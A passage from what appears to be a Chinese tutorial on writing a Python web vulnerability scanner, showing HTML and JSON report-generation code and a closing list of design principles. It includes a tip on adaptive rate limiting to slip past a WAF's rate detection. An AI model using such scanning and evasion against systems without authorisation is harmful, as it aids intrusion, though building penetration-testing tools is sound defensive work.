findings_html='\n'.join(findings_html_parts) or "<p>✅ 未发现漏洞</p>",
gen_time=datetime.now().strftime("%Y-%m-%d %H:%M:%S")
)
Path(output_path).parent.mkdir(parents=True, exist_ok=True)
with open(output_path, 'w', encoding='utf-8') as f:
f.write(html_content)
print(f"[+] HTML report saved to {output_path}")
def generate_json(self, output_path: str):
"""生成JSON报告"""
report = {
"scan_time": datetime.now().isoformat(),
"target_url": self.target_url,
"total_findings": len(self.findings),
"findings": [
{
"name": v.name,
"description": v.description,
"severity": v.severity.value,
"url": v.url,
"parameter": v.parameter,
"payload": v.payload,
"evidence": v.evidence,
"cvss_score": v.cvss_score,
"cwe_id": v.cwe_id,
"remediation": v.remediation
}
for v in self.findings
]
}
with open(output_path, 'w', encoding='utf-8') as f:
json.dump(report, f, indent=2, ensure_ascii=False)
print(f"[+] JSON report saved to {output_path}")
七、总结与最佳实践
自建扫描器的核心在于模块化设计和可扩展性——今天你可能只需要SQL注入检测,明天可能需要添加SSRF、XXE、SSTI等检测模块。良好的插件系统让你可以像搭积木一样扩展扫描能力。
几个关键的设计原则:
- 异步优先:asyncio + aiohttp 组合让并发扫描效率比多线程方案高出数倍
- 速率可控:自适应速率限制避免触发WAF的速率检测
- Payload可管理:YAML格式让Payload库易于维护和共享
- 结果结构化:漏洞数据结构化存储,便于后续分析和联动
完整代码建议组织为Python包,配合Click/Fire等CLI框架提供命令行入口,让扫描器成为渗透测试工具箱中的瑞士军刀。